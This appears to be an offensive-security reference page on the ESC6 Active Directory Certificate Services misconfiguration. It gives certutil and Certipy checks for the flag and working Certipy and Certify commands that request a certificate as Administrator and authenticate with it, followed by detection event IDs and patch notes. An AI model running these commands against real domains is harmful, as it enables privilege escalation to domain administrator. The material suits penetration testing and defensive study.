attack-31-esc6-editf-attributesubjectaltname2-flag.md (3876B)
1 --- 2 title: "Attack #31 β ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 Flag" 3 description: "ESC6 is a CA-wide misconfiguration where the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is enabled on the Certificate Authority. When this flag is set, it allowsβ¦" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs"] 7 tools: ["Certipy", "Certify", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/π’ Attack #31 β ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 Flag.md" 11 --- 12 # π’ Attack #31 β ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag 13 14 *** 15 16 ## π How It Works 17 18 ESC6 is a **CA-wide misconfiguration** where the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is enabled on the Certificate Authority. When this flag is set, it allows certificate requesters to specify an arbitrary **Subject Alternative Name (SAN)** in their certificate request β regardless of the template's configuration. This means even templates that normally don't allow SAN specification become vulnerable β the attacker can request a certificate for any user in the domain. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **EDITF_ATTRIBUTESUBJECTALTNAME2 enabled on CA** | CA-level configuration flag | 27 | **Enrollment rights on any Client Auth template** | Any template with Client Authentication EKU | 28 29 *** 30 31 ## π» Full Commands 32 33 ### π΅ Check If Flag Is Enabled 34 35 ```powershell 36 # ββ certutil (on the CA or targeting it remotely) βββββββββββββββββββββββββββββ 37 certutil -config "CORP-CA" -getreg policy\EditFlags 38 # Look for: EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144) 39 ``` 40 41 ```bash 42 # ββ Certipy βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 43 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout 44 # Look for: ESC6 β EDITF_ATTRIBUTESUBJECTALTNAME2 is set 45 ``` 46 47 ### π΄ Exploit ESC6 48 49 ```bash 50 # ββ Request cert with arbitrary SAN using ANY template ββββββββββββββββββββββββ 51 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \ 52 -template User -upn Administrator@corp.local -dc-ip 10.10.10.10 53 54 # ββ Authenticate as Administrator βββββββββββββββββββββββββββββββββββββββββββββ 55 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 56 ``` 57 58 ```powershell 59 # ββ Certify βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 60 .\Certify.exe request /ca:CORP-CA /template:User /altname:Administrator 61 ``` 62 63 *** 64 65 ## π― OPSEC Tips 66 67 - **ESC6 affects ALL templates** β even properly configured ones become vulnerable 68 - **Microsoft patched this** in May 2022 (KB5014754) β patched CAs ignore SAN in request if template doesn't allow it 69 - **Check patch level** β unpatched CAs are still vulnerable 70 71 *** 72 73 ## π‘οΈ Detection β Event IDs 74 75 | Event ID | Source | What to Look For | 76 |---|---|---| 77 | **4886** | Security Log (CA) | Certificate enrollment with SAN different from requester | 78 | **4887** | Security Log (CA) | Certificate issued with arbitrary SAN | 79 80 *** 81 82 ## π Attack Chain Context 83 84 ``` 85 [ESC6] βββ CA flag allows SAN on ANY template β impersonate any user 86 β 87 ββββ π Makes every template ESC1-equivalent 88 ββββ π Patched in KB5014754 (May 2022) 89 ββββ π Defeated by: disable EDITF flag, patch CA, audit enrollments 90 ``` 91 92 *** 93 94 > β **Attack #31 β ESC6 complete.**